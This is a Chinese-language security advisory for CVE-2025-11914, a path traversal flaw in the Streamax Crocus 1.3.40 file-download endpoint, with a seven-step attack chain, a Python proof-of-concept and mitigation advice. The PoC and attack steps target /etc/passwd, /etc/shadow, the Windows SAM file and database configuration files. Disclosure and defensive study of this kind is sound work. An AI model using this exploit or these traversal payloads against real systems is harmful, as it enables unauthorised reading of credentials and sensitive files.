CVE-2025-11914：Streamax Crocus路径遍历漏洞

漏洞信息

漏洞编号

CVE-2025-11914

漏洞类型

路径遍历（Path Traversal）

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Shenzhen Ruiming Technology Streamax Crocus

漏洞概述

CVE-2025-11914是深圳市锐明技术股份有限公司（CroCus）车载视频监控系统Streamax Crocus 1.3.40版本中存在的一个路径遍历（Path Traversal）漏洞。该漏洞位于系统文件下载接口/DeviceFileReport.do的Action=Download方法中，具体影响Download函数对FilePath参数的处理逻辑。攻击者可以通过精心构造的FilePath参数，利用未充分校验的路径拼接机制，实现对服务器文件系统的任意目录访问和文件下载操作。

该漏洞的CVSS 3.1评分为4.3分，属于中危级别。其攻击向量为网络（AV:N），攻击复杂度低（AC:L），但需要低权限认证（PR:L），无需用户交互（UI:N）。漏洞对机密性影响为低（C:L），对完整性和可用性无影响。由于该漏洞可远程触发，且利用代码已被公开披露，潜在的安全风险不容忽视。值得注意的是，漏洞发现者在披露前已联系厂商，但厂商未做出任何回应，这进一步增加了受影响用户面临的安全威胁。

技术细节

该漏洞的核心问题在于Streamax Crocus 1.3.40的/DeviceFileReport.do接口中Download函数对用户输入的FilePath参数缺乏充分的路径校验和过滤。具体而言，当系统处理文件下载请求时，Download函数直接将用户传入的FilePath参数用于文件系统操作，未对其中可能包含的目录遍历序列（如../或..\\）进行有效拦截或规范化处理。

攻击者可以通过在FilePath参数中注入类似../../../etc/passwd或..\\..\\windows\\system32\\config\\SAM等恶意路径，绕过应用层预设的文件访问限制，访问服务器上的任意文件。攻击流程如下：首先，攻击者需获取有效的低权限账户凭证（PR:L）；然后，构造包含路径遍历序列的HTTP请求，发送到/DeviceFileReport.do?Action=Download端点；服务端解析请求后，由于未对路径进行安全校验，将恶意路径拼接到实际文件操作中；最终，攻击者可以读取服务器上的敏感配置文件、日志文件或其他重要数据。

由于漏洞仅影响机密性（C:L），攻击者主要利用该漏洞进行信息窃取，而非破坏系统完整性或导致服务中断。但泄露的敏感信息（如配置文件中的数据库凭证、系统密钥等）可能被用于进一步的攻击活动。

攻击链分析

STEP 1

步骤1：信息收集

攻击者首先对目标Streamax Crocus系统进行侦察，识别系统版本（1.3.40）及暴露的Web接口，确认/DeviceFileReport.do端点的存在。

STEP 2

步骤2：获取凭证

由于漏洞利用需要低权限认证（PR:L），攻击者通过钓鱼、暴力破解或购买暗网凭证等方式获取有效的低权限用户账户。

STEP 3

步骤3：身份认证

使用获取的凭证登录系统，获取有效的会话Cookie或Session ID，为后续漏洞利用建立认证会话。

STEP 4

步骤4：构造恶意请求

攻击者构造包含路径遍历序列的HTTP请求，将FilePath参数设置为../../../etc/passwd等恶意路径。

STEP 5

步骤5：发送攻击请求

通过认证会话向/DeviceFileReport.do?Action=Download发送GET请求，携带恶意FilePath参数。

STEP 6

步骤6：读取敏感文件

服务端未对路径进行安全校验，攻击者成功读取服务器上的敏感文件，如系统配置文件、数据库凭证等。

STEP 7

步骤7：信息利用

利用获取的敏感信息进行进一步攻击，如横向移动、权限提升或数据窃取。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-11914 - Streamax Crocus Path Traversal PoC
# Vulnerability: Path Traversal in /DeviceFileReport.do?Action=Download
# Affected: Streamax Crocus 1.3.40

import requests

# Target configuration
TARGET_URL = "http://target-host:8080"
LOGIN_URL = f"{TARGET_URL}/login.do"
DOWNLOAD_URL = f"{TARGET_URL}/DeviceFileReport.do?Action=Download"

# Attacker credentials (low privilege required)
USERNAME = "low_priv_user"
PASSWORD = "password123"

# Step 1: Authenticate to obtain session
session = requests.Session()
login_data = {
    "username": USERNAME,
    "password": PASSWORD
}
session.post(LOGIN_URL, data=login_data)

# Step 2: Exploit path traversal via FilePath parameter
# The FilePath parameter is not properly sanitized,
# allowing directory traversal sequences (../)
malicious_paths = [
    "../../../etc/passwd",
    "..\\..\\..\\windows\\system32\\config\\SAM",
    "../../../etc/shadow",
    "../../../../config/application.properties",
    "../../../opt/streamax/conf/database.conf"
]

for path in malicious_paths:
    params = {"FilePath": path}
    response = session.get(DOWNLOAD_URL, params=params)
    
    if response.status_code == 200 and len(response.content) > 0:
        print(f"[+] Successfully read file via path: {path}")
        print(f"[+] Content preview: {response.content[:200]}")
        break
    else:
        print(f"[-] Failed to read file via path: {path}")

影响范围

Shenzhen Ruiming Technology Streamax Crocus 1.3.40

防御指南

临时缓解措施

在厂商发布正式补丁之前，建议采取以下临时缓解措施：1）对/DeviceFileReport.do接口实施访问控制，限制仅特定IP地址可访问；2）在Web服务器或反向代理层面配置规则，对包含../或..\\的请求进行拦截；3）修改应用代码，对FilePath参数进行严格的路径校验，确保其只能访问预设目录下的文件；4）监控异常的文件下载请求，及时发现和阻断潜在攻击；5）加强账户安全管理，避免低权限凭证泄露。